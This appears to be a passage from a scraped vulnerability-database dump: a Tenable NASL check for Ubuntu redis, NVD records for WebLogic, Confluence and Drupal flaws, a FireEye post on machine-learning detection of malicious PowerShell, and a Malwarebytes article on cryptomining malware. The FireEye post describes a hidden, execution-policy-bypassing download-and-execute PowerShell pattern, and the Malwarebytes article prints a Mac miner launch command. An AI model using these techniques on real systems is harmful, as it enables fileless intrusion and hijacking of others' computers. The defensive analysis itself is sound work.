value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2022/02/18\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2022/03/08\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2022/03/08\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:20.04:-:lts\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:21.10\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:redis\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:redis-sentinel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:redis-server\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:redis-tools\");\n script_end_attributes();\n\n 
script_category(ACT_GATHER_INFO);\n script_family(english:\"Ubuntu Local Security Checks\");\n\n script_copyright(english:\"Ubuntu Security Notice (C) 2022 Canonical, Inc. / NASL script (C) 2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/cpu\", \"Host/Ubuntu\", \"Host/Ubuntu/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\ninclude('audit.inc');\ninclude('ubuntu.inc');\ninclude('misc_func.inc');\n\nif ( ! get_kb_item('Host/local_checks_enabled') ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nvar release = get_kb_item('Host/Ubuntu/release');\nif ( isnull(release) ) audit(AUDIT_OS_NOT, 'Ubuntu');\nvar release = chomp(release);\nif (! preg(pattern:\"^(20\\.04|21\\.10)$\", string:release)) audit(AUDIT_OS_NOT, 'Ubuntu 20.04 / 21.10', 'Ubuntu ' + release);\nif ( ! get_kb_item('Host/Debian/dpkg-l') ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nvar cpu = get_kb_item('Host/cpu');\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif ('x86_64' >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, 'Ubuntu', cpu);\n\n\nvar pkgs = [\n {'osver': '20.04', 'pkgname': 'redis', 'pkgver': '5:5.0.7-2ubuntu0.1'},\n {'osver': '20.04', 'pkgname': 'redis-sentinel', 'pkgver': '5:5.0.7-2ubuntu0.1'},\n {'osver': '20.04', 'pkgname': 'redis-server', 'pkgver': '5:5.0.7-2ubuntu0.1'},\n {'osver': '20.04', 'pkgname': 'redis-tools', 'pkgver': '5:5.0.7-2ubuntu0.1'},\n {'osver': '21.10', 'pkgname': 'redis', 'pkgver': '5:6.0.15-1ubuntu0.1'},\n {'osver': '21.10', 'pkgname': 'redis-sentinel', 'pkgver': '5:6.0.15-1ubuntu0.1'},\n {'osver': '21.10', 'pkgname': 'redis-server', 'pkgver': '5:6.0.15-1ubuntu0.1'},\n {'osver': '21.10', 'pkgname': 'redis-tools', 'pkgver': '5:6.0.15-1ubuntu0.1'}\n];\n\nvar flag = 0;\nforeach package_array ( pkgs ) {\n var osver = NULL;\n var pkgname = NULL;\n var pkgver = NULL;\n if (!empty_or_null(package_array['osver'])) osver = package_array['osver'];\n if 
(!empty_or_null(package_array['pkgname'])) pkgname = package_array['pkgname'];\n if (!empty_or_null(package_array['pkgver'])) pkgver = package_array['pkgver'];\n if (osver && pkgname && pkgver) {\n if (ubuntu_check(osver:osver, pkgname:pkgname, pkgver:pkgver)) flag++;\n }\n}\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : ubuntu_report_get()\n );\n exit(0);\n}\nelse\n{\n var tested = ubuntu_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, 'redis / redis-sentinel / redis-server / redis-tools');\n}\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "cve": [{"lastseen": "2022-03-23T12:18:26", "description": "Vulnerability in the Oracle WebLogic Server component of Oracle Fusion Middleware (subcomponent: WLS Security). Supported versions that are affected are 10.3.6.0.0, 12.1.3.0.0, 12.2.1.1.0 and 12.2.1.2.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via T3 to compromise Oracle WebLogic Server. Successful attacks of this vulnerability can result in takeover of Oracle WebLogic Server. CVSS 3.0 Base Score 7.5 (Availability impacts). 
CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2017-10-19T17:29:00", "type": "cve", "title": "CVE-2017-10271", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-10271"], "modified": "2019-10-03T00:03:00", "cpe": ["cpe:/a:oracle:weblogic_server:10.3.6.0.0", "cpe:/a:oracle:weblogic_server:12.1.3.0.0", "cpe:/a:oracle:weblogic_server:12.2.1.1.0", "cpe:/a:oracle:weblogic_server:12.2.1.2.0"], "id": "CVE-2017-10271", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-10271", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}, "cpe23": ["cpe:2.3:a:oracle:weblogic_server:12.2.1.1.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:weblogic_server:10.3.6.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:weblogic_server:12.1.3.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:weblogic_server:12.2.1.2.0:*:*:*:*:*:*:*"]}, {"lastseen": "2022-06-10T17:24:19", "description": "In affected versions of Confluence Server and Data Center, an OGNL injection vulnerability exists that would allow an unauthenticated attacker to execute arbitrary code on a Confluence Server 
or Data Center instance. The affected versions are before version 6.13.23, from version 6.14.0 before 7.4.11, from version 7.5.0 before 7.11.6, and from version 7.12.0 before 7.12.5.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-08-30T07:15:00", "type": "cve", "title": "CVE-2021-26084", "cwe": ["CWE-74"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26084"], "modified": "2022-06-10T14:26:00", "cpe": [], "id": "CVE-2021-26084", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-26084", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": []}, {"lastseen": "2022-03-23T18:38:38", "description": "Drupal before 7.58, 8.x before 8.3.9, 8.4.x before 8.4.6, and 8.5.x before 8.5.1 allows remote attackers to execute arbitrary code because of an issue affecting multiple subsystems with default or common module configurations.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": 
"HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-03-29T07:29:00", "type": "cve", "title": "CVE-2018-7600", "cwe": ["CWE-20"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-7600"], "modified": "2019-03-01T18:04:00", "cpe": ["cpe:/a:drupal:drupal:7.57", "cpe:/o:debian:debian_linux:9.0", "cpe:/o:debian:debian_linux:7.0", "cpe:/o:debian:debian_linux:8.0"], "id": "CVE-2018-7600", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-7600", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:o:debian:debian_linux:9.0:*:*:*:*:*:*:*", "cpe:2.3:o:debian:debian_linux:8.0:*:*:*:*:*:*:*", "cpe:2.3:a:drupal:drupal:7.57:*:*:*:*:*:*:*", "cpe:2.3:o:debian:debian_linux:7.0:*:*:*:*:*:*:*"]}, {"lastseen": "2022-04-27T19:41:24", "description": "Vulnerability in the Oracle WebLogic Server component of Oracle Fusion Middleware (subcomponent: Web Services). Supported versions that are affected are 10.3.6.0.0 and 12.1.3.0.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle WebLogic Server. Successful attacks of this vulnerability can result in takeover of Oracle WebLogic Server. CVSS 3.0 Base Score 9.8 (Confidentiality, Integrity and Availability impacts). 
CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2019-04-26T19:29:00", "type": "cve", "title": "CVE-2019-2725", "cwe": ["CWE-74"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-2725"], "modified": "2022-04-27T16:39:00", "cpe": ["cpe:/a:oracle:agile_plm:9.3.5", "cpe:/a:oracle:agile_plm:9.3.4", "cpe:/a:oracle:weblogic_server:12.1.3.0.0", "cpe:/a:oracle:peoplesoft_enterprise_peopletools:8.57", "cpe:/a:oracle:storagetek_tape_analytics_sw_tool:2.3", "cpe:/a:oracle:tape_virtual_storage_manager_gui:6.2", "cpe:/a:oracle:communications_converged_application_server:7.1", "cpe:/a:oracle:peoplesoft_enterprise_peopletools:8.56", "cpe:/a:oracle:vm_virtualbox:5.2.36", "cpe:/a:oracle:weblogic_server:10.3.6.0.0", "cpe:/a:oracle:tape_library_acsls:8.5", "cpe:/a:oracle:communications_converged_application_server:5.1", "cpe:/a:oracle:communications_converged_application_server:7.0", "cpe:/a:oracle:agile_plm:9.3.3", "cpe:/a:oracle:peoplesoft_enterprise_peopletools:8.58"], "id": "CVE-2019-2725", "href": 
"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2019-2725", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:oracle:agile_plm:9.3.5:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:communications_converged_application_server:5.1:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:communications_converged_application_server:7.1:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:peoplesoft_enterprise_peopletools:8.56:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:storagetek_tape_analytics_sw_tool:2.3:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:tape_virtual_storage_manager_gui:6.2:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:weblogic_server:10.3.6.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:communications_converged_application_server:7.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:peoplesoft_enterprise_peopletools:8.57:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:vm_virtualbox:5.2.36:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:weblogic_server:12.1.3.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:agile_plm:9.3.3:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:tape_library_acsls:8.5:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:agile_plm:9.3.4:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:peoplesoft_enterprise_peopletools:8.58:*:*:*:*:*:*:*"]}], "fireeye": [{"lastseen": "2018-08-31T00:18:22", "description": "#### Introduction****\n\nCyber security vendors and researchers have reported for years how PowerShell is being used by cyber threat actors to [install backdoors](<https://www.fireeye.com/blog/threat-research/2017/02/spear_phishing_techn.html>), [execute malicious code](<https://www.csoonline.com/article/3227046/malware/what-is-a-fileless-attack-how-hackers-invade-systems-without-installing-software.html>), and otherwise achieve their objectives within enterprises. Security is a cat-and-mouse game between adversaries, researchers, and blue teams. The flexibility and capability of PowerShell has made conventional detection both challenging and critical. 
This blog post will illustrate how FireEye is leveraging artificial intelligence and machine learning to raise the bar for adversaries that use PowerShell.\n\nIn this post you will learn:\n\n * Why malicious PowerShell can be challenging to detect with a traditional \u201csignature-based\u201d or \u201crule-based\u201d detection engine.\n * How Natural Language Processing (NLP) can be applied to tackle this challenge.\n * How our NLP model detects malicious PowerShell commands, even if obfuscated.\n * The economics of increasing the cost for the adversaries to bypass security solutions, while potentially reducing the release time of security content for detection engines.\n\n#### Background****\n\nPowerShell is one of the most [popular tools](<https://www.fireeye.com/blog/threat-research/2017/05/cyber-espionage-apt32.html>) used to carry out attacks. Data gathered from FireEye Dynamic Threat Intelligence (DTI) Cloud shows malicious PowerShell attacks rising throughout 2017 (Figure 1).\n\n \nFigure 1: PowerShell attack statistics observed by FireEye DTI Cloud in 2017 \u2013 blue bars for the number of attacks detected, with the red curve for exponentially smoothed time series\n\nFireEye has been tracking the malicious use of PowerShell for years. In 2014, Mandiant incident response investigators published a Black Hat paper that covers the [tactics, techniques and procedures (TTPs) used in PowerShell attacks](<https://www.blackhat.com/docs/us-14/materials/us-14-Kazanciyan-Investigating-Powershell-Attacks-WP.pdf>), as well as forensic artifacts on disk, in logs, and in memory produced from malicious use of PowerShell. In 2016, we published a blog post on how to [improve PowerShell logging](<https://www.fireeye.com/blog/threat-research/2016/02/greater_visibilityt.html>), which gives greater visibility into potential attacker activity. 
More recently, our in-depth report on [APT32](<https://www.fireeye.com/blog/threat-research/2017/05/cyber-espionage-apt32.html>) highlighted this threat actor's use of PowerShell for reconnaissance and lateral movement procedures, as illustrated in Figure 2.\n\n \nFigure 2: APT32 attack lifecycle, showing PowerShell attacks found in the kill chain\n\nLet\u2019s take a deep dive into an example of a malicious PowerShell command (Figure 3).\n\n \nFigure 3: Example of a malicious PowerShell command\n\nThe following is a quick explanation of the [arguments](<https://docs.microsoft.com/en-us/powershell/scripting/powershell-scripting?view=powershell-6>):\n\n * -NoProfile \u2013 indicates that the current user\u2019s profile setup script should not be executed when the PowerShell engine starts.\n * -NonI \u2013 shorthand for -NonInteractive, meaning an interactive prompt to the user will not be presented.\n * -W Hidden \u2013 shorthand for \u201c-WindowStyle Hidden\u201d, which indicates that the PowerShell session window should be started in a hidden manner.\n * -Exec Bypass \u2013 shorthand for \u201c-ExecutionPolicy Bypass\u201d, which disables the execution policy for the current PowerShell session (default disallows execution). It should be noted that the Execution Policy isn\u2019t meant to be a security boundary.\n * -encodedcommand \u2013 indicates the following chunk of text is a base64 encoded command.\n\nWhat is hidden inside the Base64 decoded portion? 
Figure 4 shows the decoded command.\n\n \nFigure 4: The decoded command for the aforementioned example\n\nInterestingly, the decoded command unveils a stealthy fileless network access and remote content execution!\n\n * _IEX_ is an alias for the _Invoke-Expression_ cmdlet that will execute the command provided on the local machine.\n * **The _new-object_** cmdlet creates an instance of a .NET Framework or COM object, here a _net.webclient_ object.\n * The _downloadstring_ will download the contents from <url> into a memory buffer (which in turn _IEX_ will execute).\n\nIt\u2019s worth mentioning that a similar malicious PowerShell tactic was used in a recent cryptojacking attack exploiting [CVE-2017-10271 to deliver a cryptocurrency miner](<https://www.fireeye.com/blog/threat-research/2018/02/cve-2017-10271-used-to-deliver-cryptominers.html>). This attack involved the exploit being leveraged to deliver a PowerShell script, instead of downloading the executable directly. This PowerShell command is particularly stealthy because it leaves practically zero file artifacts on the host, making it hard for traditional antivirus to detect.\n\nThere are several reasons why adversaries prefer PowerShell:\n\n 1. PowerShell has been widely adopted in Microsoft Windows as a powerful system administration scripting tool.\n 2. Most attacker logic can be written in PowerShell without the need to install malicious binaries. This enables a minimal footprint on the endpoint.\n 3. 
The flexible PowerShell syntax imposes combinatorial complexity challenges to signature-based detection rules.\n\nAdditionally, from an economics perspective:\n\n * Offensively, the cost for adversaries to modify PowerShell to bypass a signature-based rule is quite low, especially with [open source obfuscation tools](<https://www.fireeye.com/blog/threat-research/2017/07/revoke-obfuscation-powershell.html>).\n * Defensively, updating handcrafted signature-based rules for new threats is time-consuming and limited to experts.\n\nNext, we would like to share how we at FireEye are combining our PowerShell threat research with data science to combat this threat, thus raising the bar for adversaries.\n\n#### Natural Language Processing for Detecting Malicious PowerShell****\n\nCan we use machine learning to predict if a PowerShell command is malicious?\n\nOne advantage FireEye has is our repository of high quality PowerShell examples that we harvest from our global deployments of FireEye solutions and services. Working closely with our in-house PowerShell experts, we curated a large training set that was comprised of malicious commands, as well as benign commands found in enterprise networks.\n\nAfter we reviewed the PowerShell corpus, we quickly realized this fit nicely into the NLP problem space. We have built an NLP model that interprets PowerShell command text, similar to how Amazon Alexa interprets your voice commands.\n\nOne of the technical challenges we tackled was** **synonym, a problem studied in linguistics. For instance, \u201cNOL\u201d, \u201cNOLO\u201d, and \u201cNOLOGO\u201d have identical semantics in PowerShell syntax. 
In NLP, a [stemming](<https://en.wikipedia.org/wiki/Stemming>) algorithm will reduce the word to its original form, such as \u201cInnovating\u201d being stemmed to \u201cInnovate\u201d.\n\nWe created a prefix-tree based stemmer for the PowerShell command syntax using an efficient data structure known as [trie](<https://en.wikipedia.org/wiki/Trie>), as shown in Figure 5. Even in a complex scripting language such as PowerShell, a trie can stem command tokens in nanoseconds.\n\n \nFigure 5: Synonyms in the PowerShell syntax (left) and the trie stemmer capturing these equivalences (right)\n\nThe overall NLP pipeline we developed is captured in the following table:\n\nNLP Key Modules\n\n| \n\nFunctionality \n \n---|--- \n \nDecoder\n\n| \n\nDetect and decode any encoded text \n \nNamed Entity Recognition (NER)\n\n| \n\nDetect and recognize any entities such as IP, URL, Email, Registry key, etc. \n \nTokenizer\n\n| \n\nTokenize the PowerShell command into a list of tokens \n \nStemmer\n\n| \n\nStem tokens into semantically identical token, uses trie \n \nVocabulary Vectorizer\n\n| \n\nVectorize the list of tokens into machine learning friendly format \n \nSupervised classifier\n\n| \n\nBinary classification algorithms:\n\n * Kernel Support Vector Machine\n * Gradient Boosted Trees\n * Deep Neural Networks \n \nReasoning\n\n| \n\nThe explanation of why the prediction was made. Enables analysts to validate predications. 
\n \nThe following are the key steps when streaming the aforementioned example through the NLP pipeline:\n\n * Detect and decode the Base64 commands, if any\n * Recognize entities using Named Entity Recognition (NER), such as the <URL>\n * Tokenize the entire text, including both clear text and obfuscated commands\n * Stem each token, and vectorize them based on the vocabulary\n * Predict the malicious probability using the supervised learning model\n\n \nFigure 6: NLP pipeline that predicts the malicious probability of a PowerShell command\n\nMore importantly, we established a production end-to-end machine learning pipeline (Figure 7) so that we can constantly evolve with adversaries through re-labeling and re-training, and the release of the machine learning model into our products.\n\n \nFigure 7: End-to-end machine learning production pipeline for PowerShell machine learning\n\n#### Value Validated in the Field****\n\nWe successfully implemented and optimized this machine learning model to a minimal footprint that fits into our research endpoint agent, which is able to make predictions in milliseconds on the host. Throughout 2018, we have deployed this PowerShell machine learning detection engine on incident response engagements. Early field validation has confirmed detections of malicious PowerShell attacks, including:\n\n * Commodity malware such as Kovter.\n * Red team penetration test activities.\n * New variants that bypassed legacy signatures, while detected by our machine learning with high probabilistic confidence.\n\nThe unique values brought by the PowerShell machine learning detection engine include: \n\n * The machine learning model automatically learns the malicious patterns from the curated corpus. 
In contrast to traditional detection signature rule engines, which are Boolean expression and regex based, the NLP model has lower operation cost and significantly cuts down the release time of security content.\n * The model performs probabilistic inference on unknown PowerShell commands by the implicitly learned non-linear combinations of certain patterns, which increases the cost for the adversaries to bypass.\n\nThe ultimate value of this innovation is to evolve with the broader threat landscape, and to create a competitive edge over adversaries.\n\n#### Acknowledgements\n\nWe would like to acknowledge:\n\n * Daniel Bohannon, Christopher Glyer and Nick Carr for the support on threat research.\n * Alex Rivlin, HeeJong Lee, and Benjamin Chang from FireEye Labs for providing the DTI statistics.\n * Research endpoint support from Caleb Madrigal.\n * The FireEye ICE-DS Team.\n", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "baseScore": 7.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 3.6}, "published": "2018-07-10T12:00:00", "type": "fireeye", "title": "Malicious PowerShell Detection via Machine Learning", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-10271"], "modified": 
"2018-07-10T12:00:00", "id": "FIREEYE:6B4CFD4290F6444DFC070D828CEC509A", "href": "https://www.fireeye.com/blog/threat-research/2018/07/malicious-powershell-detection-via-machine-learning.html", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}], "malwarebytes": [{"lastseen": "2018-02-26T16:50:59", "description": "While cryptocurrencies have been around for a long time and used for legitimate purposes, online criminals have certainly tarnished their reputation. Unfortunately, the same benefits offered by these decentralized and somewhat anonymous digital currencies were quickly abused to extort money, as was the case during the various ransomware outbreaks we\u2019ve witnessed in the last few years.\n\nAs the value of cryptocurrencies\u2014driven by the phenomenal rise of Bitcoin\u2014has increased significantly, a new kind of threat has become mainstream, and some might say has even surpassed all other cybercrime. Indeed, cryptocurrency mining is such a lucrative business that malware creators and distributors the world over are drawn to it like moths to a flame. The emergence of a multitude of new cryptocurrencies that can be mined by average computers has also contributed to the widespread abuse we are witnessing.\n\nMalwarebytes has been blocking coin miners with its multiple protection modules, including our real-time scanner and web protection technology. Ever since September 2017, malicious cryptomining has been our top detection overall.\n\n### Cryptomining malware\n\nTo maximize their profits, threat actors are leveraging the computing power of as many devices as they can. 
But first, they must find ways to deliver the malicious coin miners on a large enough scale.\n\nWhile the Wannacry ransomware was highly publicized for taking advantage of the leaked EternalBlue and DoublePulsar exploits, at least [two different groups](<https://www.proofpoint.com/us/threat-insight/post/smominru-monero-mining-botnet-making-millions-operators>) used those same vulnerabilities to infect hundreds of thousands of Windows servers with a cryptocurrency miner, ultimately generating millions of dollars in revenue.\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2018/02/IP__scan-1.png> \"\" )\n\n_Figure 1: Worm scanning random IP addresses on port 445 _\n\nOther vulnerabilities, such as a flaw with Oracle's WebLogic Server ([CVE-2017-10271](<https://www.cvedetails.com/cve/CVE-2017-10271/>)), were also used to deliver miners onto servers at [universities and research institutions](<https://www.ren-isac.net/public-resources/alerts/REN-ISAC_ADVISORY_Oracle_WebLogic_Vulnerability_Bitcoin_Miner_Attacks_20180105v1.pdf>). While Oracle released a [patch](<https://www.oracle.com/technetwork/topics/security/cpuoct2017-3236626.html>) in October 2017, many did not apply it in a timely fashion, and a [PoC](<https://github.com/Luffin/CVE-2017-10271>) only facilitated widespread abuse.\n\nAs it turns out, servers happen to be a favorite among criminals because they offer the most horsepower, or to use the proper term, the highest hash rate to crunch through and solve the mathematical operations required by cryptomining. In recent times, we saw individuals who, against their better judgement, took this to the next level by using supercomputers in various [critical infrastructure](<https://www.wired.com/story/cryptojacking-critical-infrastructure/>) environments.\n\n### Spam and exploit kits campaigns\n\nEven malware authors have caught the cryptocurrency bug. 
Existing malware families like Trickbot, distributed via malicious spam attachments, temporarily added in a [coin miner module](<https://twitter.com/VK_Intel/status/959194022735523841>).\n\nInterestingly, the Trickbot authors had already expanded their banking Trojan to [steal credentials from Coinbase users](<https://blogs.forcepoint.com/security-labs/trickbot-goes-after-cryptocurrency>) as they logged into their electronic wallet. The modular nature of their malware is certainly making it easier for them to experiment with new schemes to make money.\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2018/02/Spam-1.png> \"\" )\n\n_Figure 2: Document containing macro that downloads the TrickBot malware_\n\nSeveral exploit kits, and [RIG EK](<https://blog.malwarebytes.com/threat-analysis/2018/01/rig-exploit-kit-campaign-gets-deep-into-crypto-craze/>) in particular have been distributing miners, usually via the intermediary of the SmokeLoader malware. In fact, cryptominers are one of the most commonly served payloads in drive-by download attacks.\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2018/02/RIG_miner-1.png> \"\" )\n\n_Figure 3: An iframe redirection to RIG EK followed by a noticeable coin miner infection_\n\n### Mobile and Mac cryptominers\n\nMobile users are not immune to cryptomining either, as [Trojanized apps laced with mining code](<https://blog.malwarebytes.com/cybercrime/2018/02/bogus-hack-apps-hack-users-back-for-cryptocash/>) are also commonplace, especially for the Android platform. 
Similarly to Windows malware, malicious APKs tend to have modules for specific functionalities, such as SMS spam and of course miners.\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2018/02/Android-1.jpg> \"\" )\n\n_Figure 4: Source code for the mining component within an Android APK_\n\nLegitimate mining pools such as [Minergate](<https://en.bitcoin.it/wiki/MinerGate>) are often used by those Android miners, and the same is true for [Mac cryptominers](<https://blog.malwarebytes.com/threat-analysis/2018/02/new-information-unfolds-regarding-mac-cryptominer/>). The usual advice on sticking to official websites to download applications applies but is not always enough, especially when [trusted applications get hacked](<https://blog.malwarebytes.com/threat-analysis/2018/02/new-mac-cryptominer-distributed-via-a-macupdate-hack/>).\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2018/02/Mac-1.png> \"\" )\n \n \n ~/Library/Apple/Dock -user sarahmayergo1990@gmail.com@gmail.com -xmr\n\n_Figure 5: Malicious Mac application launching a Monero miner_\n\n### Drive-by cryptomining\n\nIn mid-September 2017, a mysterious entity called Coinhive launched a new service that was about to create chaos on the web, as it introduced an API to mine the Monero currency directly within the browser.\n\nWhile in-browser miners have taken off because of Coinhive's popularity, they had already been tested a few years ago, mostly as proof-of-concepts that did not develop much further. There is, however, the legal precedent of a [group of students at MIT](<https://venturebeat.com/2014/02/12/new-jersey-slaps-mit-bitcoin-hackers-with-subpoena-and-theyre-fighting-back/>) who got sued by the state of New Jersey for their coin mining attempt\u2014called Tidbit\u2014proposed as an alternative to traditional display 